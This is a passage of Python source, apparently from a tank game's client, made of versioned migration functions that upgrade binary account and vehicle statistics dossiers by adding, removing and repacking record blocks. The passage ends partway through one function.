def __updateFromAccountDossier95(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut',
'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'fortSortiesInClan', [
('middleBattlesCount', 'I'), ('championBattlesCount', 'I'), ('absoluteBattlesCount', 'I'),
('middleWins', 'I'), ('championWins', 'I'), ('absoluteWins', 'I'), ('fortResource', 'I')], {})
setVersion(updateCtx, 96)
return (
96, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier96(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut',
'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'maxGlobalMapMiddle')
addBlock(updateCtx, 'maxGlobalMapChampion')
addBlock(updateCtx, 'maxGlobalMapAbsolute')
setVersion(updateCtx, 97)
return (
97, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier97(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut',
'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'globalMapCommonCut')
setVersion(updateCtx, 98)
return (
98, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier98(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut',
'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'fallout')
addBlock(updateCtx, 'falloutCut')
addBlock(updateCtx, 'maxFallout')
setVersion(updateCtx, 99)
return (
99, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier99(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'achievementsRated7x7',
'rated7x7Cut',
'globalMapMiddle',
'globalMapChampion',
'globalMapAbsolute',
'maxGlobalMapMiddle',
'maxGlobalMapChampion',
'maxGlobalMapAbsolute',
'globalMapCommonCut',
'fallout',
'falloutCut',
'maxFallout']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'falloutAchievements')
setVersion(updateCtx, 100)
return (
100, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier100(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('EFC2016WinSeries', 'H'),
('maxEFC2016WinSeries', 'H'),
('EFC2016Goleador', 'H')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 101)
return (
101, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier101(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('markIBomberman', 'H'),
('markIRepairer', 'H'),
('markI100Years', 'B')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 102)
return (
102, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier102(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
modes = ('a15x15_2', 'clan2', 'company2', 'a7x7', 'historical', 'fortBattles',
'fortSorties', 'rated7x7', 'fallout', 'globalMapMiddle', 'globalMapChampion',
'globalMapAbsolute')
for mode in modes:
recordsFormat = [('battlesOnStunningVehicles', 'I'),
('stunNum', 'I'),
('damageAssistedStun', 'I')]
addRecords(updateCtx, mode, recordsFormat, {})
setVersion(updateCtx, 103)
return (
103, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier103(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
for blockName, expectedFormat in (
('fortBattlesInClan', '<IIIIIIIIIIIIIIIIIIIIIIIIIIIII'),
('fortSortiesInClan', '<IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII')):
currentSize = getBlockSize(updateCtx, blockName)
expectedSize = struct.calcsize(expectedFormat)
if currentSize < expectedSize:
recordsFormat = [('battlesOnStunningVehicles', 'I'),
('stunNum', 'I'),
('damageAssistedStun', 'I')]
addRecords(updateCtx, blockName, recordsFormat, {})
setVersion(updateCtx, 104)
return (
104, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier104(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'ranked')
addBlock(updateCtx, 'maxRanked')
addBlock(updateCtx, 'rankedCut')
addBlock(updateCtx, 'rankedBadges')
addBlock(updateCtx, 'rankedSeasons')
addBlock(updateCtx, 'rankedCurrent')
addBlock(updateCtx, 'rankedPrevious')
addBlock(updateCtx, 'maxRankedCurrent')
addBlock(updateCtx, 'maxRankedPrevious')
addBlock(updateCtx, 'rankedCurrentCut')
addBlock(updateCtx, 'rankedPreviousCut')
addBlock(updateCtx, 'rankedCurrentCycle')
addBlock(updateCtx, 'rankedPreviousCycle')
setVersion(updateCtx, 105)
return (
105, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier105(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc', 'fortMiscInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements', 'ranked', 'maxRanked', 'rankedCut', 'rankedBadges',
'rankedSeasons', 'rankedCurrent', 'rankedPrevious', 'maxRankedCurrent', 'maxRankedPrevious',
'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle', 'rankedPreviousCycle']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
removeBlock(updateCtx, 'fortMisc')
removeBlock(updateCtx, 'fortMiscInClan')
fortSortiesInClanPacking = {'middleWins': (128, 'I'),
'middleBattlesCount': (116, 'I'),'absoluteBattlesCount': (124, 'I'),'absoluteWins': (136, 'I'),
'fortResource': (140, 'I'),'championWins': (132, 'I'),'championBattlesCount': (120, 'I')
}
removeRecords(updateCtx, 'fortSortiesInClan', fortSortiesInClanPacking)
fortAchievementsPacking = {'wins': (8, 'H'),
'capturedBasesInAttack': (10, 'H'),'capturedBasesInDefence': (12, 'H')}
removeRecords(updateCtx, 'fortAchievements', fortAchievementsPacking)
setVersion(updateCtx, 106)
return (
106, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier106(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements',
'ranked', 'maxRanked', 'rankedCut', 'rankedBadges', 'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
'maxRankedCurrent', 'maxRankedPrevious', 'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
'rankedPreviousCycle']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'a30x30')
addBlock(updateCtx, 'a30x30Cut')
addBlock(updateCtx, 'max30x30')
setVersion(updateCtx, 107)
return (
107, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier107(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements',
'ranked', 'maxRanked', 'rankedCut', 'rankedBadges', 'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
'maxRankedCurrent', 'maxRankedPrevious', 'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
'rankedPreviousCycle', 'a30x30', 'a30x30Cut', 'max30x30']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
a15x15Cut = getBlockCompDescr(updateCtx, 'a15x15Cut')
markOfMasteryCutBlockFormat = ''
markOfMasteryCutBlockValues = None
if a15x15Cut:
keyFormat, valueFormat = ('I', 'IIII')
itemFormat = keyFormat + valueFormat
itemSize = struct.calcsize('<' + itemFormat)
length = len(a15x15Cut) / itemSize
fmt = '<' + itemFormat * length
values = struct.unpack(fmt, a15x15Cut)
newValues = []
markOfMasteryCutBlockFormat = '<'
markOfMasteryCutBlockValues = []
itemLength = len(itemFormat)
idx = 0
for i in xrange(length):
items = values[idx:idx + itemLength]
newValues += items[:3] + items[4:]
if items[3] != 0:
markOfMasteryCutBlockFormat += 'IB'
markOfMasteryCutBlockValues += [items[0], items[3]]
idx += itemLength
newKeyFormat, newValueFormat = ('I', 'III')
newItemFormat = newKeyFormat + newValueFormat
fmt = '<' + newItemFormat * length
newA15x15CutCompDescr = struct.pack(fmt, *newValues)
setBlockCompDescr(updateCtx, 'a15x15Cut', newA15x15CutCompDescr)
addBlock(updateCtx, 'markOfMasteryCut', markOfMasteryCutBlockFormat, markOfMasteryCutBlockValues)
setVersion(updateCtx, 108)
return (
108, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier108(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements',
'ranked', 'maxRanked', 'rankedCut', 'rankedBadges', 'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
'maxRankedCurrent', 'maxRankedPrevious', 'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
'rankedPreviousCycle', 'a30x30', 'a30x30Cut', 'max30x30', 'markOfMasteryCut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
rankedBadgesPacking = {'1': (0, 'H'),
'2': (2, 'H'),
'3': (4, 'H'),
'4': (6, 'H'),
'5': (8, 'H'),
'6': (10, 'H'),
'7': (12, 'H'),
'8': (14, 'H'),
'9': (16, 'H')
}
badges = getStaticSizeBlockRecordValues(updateCtx, 'rankedBadges', rankedBadgesPacking)
addItems = {}
_SECONDS_IN_DAY = 86400
for strBadgeID, daysTimestamp in badges.iteritems():
if daysTimestamp:
addItems[int(strBadgeID)] = daysTimestamp * _SECONDS_IN_DAY
LOG_DEBUG_DEV('addItems', addItems)
itemFormat = 'II'
subBlockFormat = '<'
subBlockValues = []
for k, v in addItems.iteritems():
subBlockFormat += itemFormat
subBlockValues.append(k)
subBlockValues.append(v)
LOG_DEBUG_DEV('subBlockFormat', subBlockFormat, subBlockValues)
addBlock(updateCtx, 'playerBadges', subBlockFormat, subBlockValues)
removeBlock(updateCtx, 'rankedBadges')
setVersion(updateCtx, 109)
return (
109, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier109(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
'falloutCut', 'maxFallout', 'falloutAchievements', 'ranked', 'maxRanked', 'rankedCuts',
'rankedSeasons', 'rankedCurrent', 'rankedPrevious', 'maxRankedCurrent', 'maxRankedPrevious',
'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle', 'rankedPreviousCycle',
'a30x30', 'a30x30Cut', 'max30x30', 'markOfMasteryCut', 'playerBadges']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'epicBattle')
addBlock(updateCtx, 'epicBattleCut')
addBlock(updateCtx, 'maxEpicBattle')
addBlock(updateCtx, 'epicBattleAchievements')
setVersion(updateCtx, 110)
return (
110, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier64(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags']
a15x15packing = {'creationTime': (0, 'I'),'battleLifeTime': (8, 'I'),'lastBattleTime': (4, 'I')}
a15x15_2packing = {'mileage': (38, 'I'),'treesCut': (36, 'H')}
achievementsPacking = {'maxFrags': (0, 'B'),'maxXP': (1, 'H'),'winAndSurvived': (3, 'I'),'frags8p': (7, 'I')
}
totalLayout = [
('creationTime', 'I'), ('lastBattleTime', 'I'), ('battleLifeTime', 'I'),
('treesCut', 'H'), ('mileage', 'I')]
max15x15Layout = [
('maxXP', 'H'), ('maxFrags', 'B'), ('maxDamage', 'H')]
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
totalDefaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
totalDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', a15x15_2packing))
if bool(totalDefaults):
blockFormat, blockValues = getNewStaticSizeBlockValues(totalLayout, totalDefaults)
else:
blockFormat, blockValues = ('', None)
addBlock(updateCtx, 'total', blockFormat, blockValues)
removeRecords(updateCtx, 'a15x15', a15x15packing)
removeRecords(updateCtx, 'a15x15_2', a15x15_2packing)
achievementsValues = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
addRecords(updateCtx, 'a15x15', [
('winAndSurvived', 'I'), ('frags8p', 'I')], achievementsValues)
addRecords(updateCtx, 'a7x7', [
('winAndSurvived', 'I'), ('frags8p', 'I')], {})
if bool(achievementsValues):
blockFormat, blockValues = getNewStaticSizeBlockValues(max15x15Layout, achievementsValues)
else:
blockFormat, blockValues = ('', None)
addBlock(updateCtx, 'max15x15', blockFormat, blockValues)
addBlock(updateCtx, 'max7x7')
removeRecords(updateCtx, 'achievements', achievementsPacking)
setVersion(updateCtx, 65)
return (
65, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier65(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'inscriptions')
addBlock(updateCtx, 'emblems')
addBlock(updateCtx, 'camouflages')
addBlock(updateCtx, 'compensation')
setVersion(updateCtx, 66)
return (
66, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier66(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
setVersion(updateCtx, 67)
return (
67, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier67(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
blockFormat = '<' + 'HHHHHHHH'
blockValues = [0] * 8
addBlock(updateCtx, 'achievements7x7', blockFormat, blockValues)
setVersion(updateCtx, 68)
return (
68, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier68(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements7x7', [('tacticalBreakthrough', 'B')], {'tacticalBreakthrough': 0})
setVersion(updateCtx, 69)
return (
69, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier69(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
headerValues = updateCtx['header'][1:]
sumAllValues = sum(headerValues)
